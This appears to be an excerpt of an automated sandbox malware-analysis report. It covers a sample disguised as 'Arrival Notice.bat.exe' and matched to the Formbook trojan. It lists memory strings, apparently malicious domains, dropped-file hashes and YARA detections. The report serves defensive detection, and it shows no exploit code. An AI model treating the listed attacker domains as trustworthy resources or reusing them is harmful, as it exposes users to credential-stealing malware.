              Source: Arrival Notice.bat.exe, 00000000.00000002.1707703228.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, dLrZsz.exe, 00000009.00000002.1918612322.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, -6qxw.exe, 00000016.00000002.3127364912.0000000002472000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: compact.exe, 00000012.00000002.4147635781.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003D3C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/css/animate.min.css
              Source: compact.exe, 00000012.00000002.4147635781.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003D3C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/js/external/vidim.min.js?v=1.0.2
              Source: compact.exe, 00000012.00000002.4147635781.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003D3C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/themes/countdown/style.css?v=4.1.
              Source: OdR8akYyHwr3ISR[1].exe.18.dr, -6qxw.exe.18.dr String found in binary or memory: http://tempuri.org/DataSet1.xsdSInventory_Management.Properties.Resources
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
              Source: WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4147800420.00000000057A4000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.leadchanges.info
              Source: WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4147800420.00000000057A4000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.leadchanges.info/mjuo/
              Source: compact.exe, 00000012.00000002.4147635781.0000000004486000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000004516000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.litespeedtech.com/error-page
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
              Source: Arrival Notice.bat.exe, 00000000.00000002.1732258181.0000000006180000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.comx6
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
              Source: compact.exe, 00000012.00000002.4147635781.0000000004DF2000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000004E82000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.searchvity.com/
              Source: compact.exe, 00000012.00000002.4147635781.0000000004DF2000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000004E82000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.searchvity.com/?dn=
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
              Source: WRrRgOfpwFEFXfaWUCsdTxK.exe, 0000001B.00000002.4147461137.000000000500C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.zonenail.info
              Source: WRrRgOfpwFEFXfaWUCsdTxK.exe, 0000001B.00000002.4147461137.000000000500C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.zonenail.info/kscn/
              Source: compact.exe, 00000012.00000002.4150230985.00000000077E8000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4149715750.0000000007B68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: compact.exe, 00000012.00000002.4150230985.00000000077E8000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4149715750.0000000007B68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: compact.exe, 00000012.00000002.4147635781.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003D3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.14.0/css/all.min.css
              Source: compact.exe, 00000012.00000002.4150230985.00000000077E8000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4149715750.0000000007B68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: compact.exe, 00000012.00000002.4150230985.00000000077E8000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4149715750.0000000007B68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: compact.exe, 00000012.00000002.4150230985.00000000077E8000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4149715750.0000000007B68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: compact.exe, 00000012.00000002.4150230985.00000000077E8000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4149715750.0000000007B68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: compact.exe, 00000012.00000002.4150230985.00000000077E8000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4149715750.0000000007B68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: compact.exe, 00000012.00000002.4147635781.0000000003E3E000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003ECE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fburl.com
              Source: compact.exe, 00000012.00000002.4147635781.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003D3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Abel:400%7CMaven
              Source: compact.exe, 00000012.00000002.4147635781.0000000003E3E000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4147635781.000000000493C000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003ECE000.00000004.00000001.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.00000000049CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
              Source: runonce.exe, 0000001A.00000002.4143575378.00000000009A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: compact.exe, 00000012.00000002.4143560755.000000000256F000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4143575378.00000000009A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
              Source: runonce.exe, 0000001A.00000002.4143575378.00000000009A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: compact.exe, 00000012.00000002.4143560755.000000000256F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
              Source: runonce.exe, 0000001A.00000002.4143575378.00000000009A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033w
              Source: runonce.exe, 0000001A.00000002.4143575378.00000000009A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: compact.exe, 00000012.00000002.4143560755.000000000256F000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4143575378.00000000009A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
              Source: compact.exe, 00000012.00000003.2230813602.00000000077CB000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000003.3694098353.0000000007B58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
              Source: compact.exe, 00000012.00000002.4147635781.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003D3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://niteothemes.com
              Source: compact.exe, 00000012.00000002.4147635781.0000000003E3E000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003ECE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://optimize.google.com
              Source: WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003D3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://shahaf3d.com
              Source: compact.exe, 00000012.00000002.4147635781.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003D3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://shahaf3d.com/wp-admin/admin-ajax.php
              Source: WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003D3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://shahaf3d.com/wp-content/uploads/2023/08/shahaf-3d-concrete-printing.jpg
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
              Source: compact.exe, 00000012.00000002.4147635781.0000000003E3E000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003ECE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://td.doubleclick.net
              Source: compact.exe, 00000012.00000002.4147635781.0000000003E3E000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003ECE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://w.ladicdn.com/v2/source/html5shiv.min.js?v=1569310222693
              Source: compact.exe, 00000012.00000002.4147635781.0000000003E3E000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003ECE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://w.ladicdn.com/v2/source/respond.min.js?v=1569310222693
              Source: compact.exe, 00000012.00000002.4147635781.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003D3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://wordpress.org/plugins/cmp-coming-soon-maintenance/
              Source: compact.exe, 00000012.00000002.4150230985.00000000077E8000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4149715750.0000000007B68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: compact.exe, 00000012.00000002.4147635781.00000000037F6000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003886000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2338332186.0000000032F46000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.futuregainers.net/l4k7/?tF1tk6=afjyNtLybwItDht4A4I53iDRENSS8jmKeO4XK5PuceGx/XGrL/B5lBywY
              Source: compact.exe, 00000012.00000002.4147635781.0000000003E3E000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003ECE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
              Source: compact.exe, 00000012.00000002.4147635781.0000000003E3E000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003ECE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googleanalytics.com
              Source: compact.exe, 00000012.00000002.4147635781.0000000003E3E000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003ECE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googleoptimize.com
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
              Source: compact.exe, 00000012.00000002.4147635781.0000000003988000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003A18000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hostgator.com.br
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
              Source: compact.exe, 00000012.00000002.4147635781.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003D3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://youtu.be/uO1hXLmT2j4
              Source: compact.exe, 00000012.00000002.4147635781.00000000042F4000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000004384000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js

              E-Banking Fraud

              Source: Yara match, File source: 8.2.Arrival Notice.bat.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 8.2.Arrival Notice.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 24.2.-6qxw.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 24.2.-6qxw.exe.400000.0.raw.unpack, type: UNPACKEDPE

              System Summary

              Source: 8.2.Arrival Notice.bat.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 8.2.Arrival Notice.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 24.2.-6qxw.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 24.2.-6qxw.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 0.2.Arrival Notice.bat.exe.5fe0000.2.raw.unpack, PingPong.cs, Large array initialization: array initializer size 12418
              Source: initial sample, Static PE information: Filename: Arrival Notice.bat.exe
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B39B0 NtGetContextThread,8_2_015B39B0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B3D70 NtOpenThread,8_2_015B3D70
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B3D10 NtOpenProcessToken,8_2_015B3D10
              Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\OdR8akYyHwr3ISR[1].exe 795551251C9B793C9E834D3EE0764B6D29D9B6716EF78349CB771AB462DDF104
              Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Local\Temp\-6qxw.exe 795551251C9B793C9E834D3EE0764B6D29D9B6716EF78349CB771AB462DDF104
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exe, Code function: String function: 0156EA12 appears 36 times
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exe, Code function: String function: 01547E54 appears 96 times
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe, Code function: String function: 015EEA12 appears 86 times
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe, Code function: String function: 015B5130 appears 58 times
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe, Code function: String function: 0156B970 appears 280 times
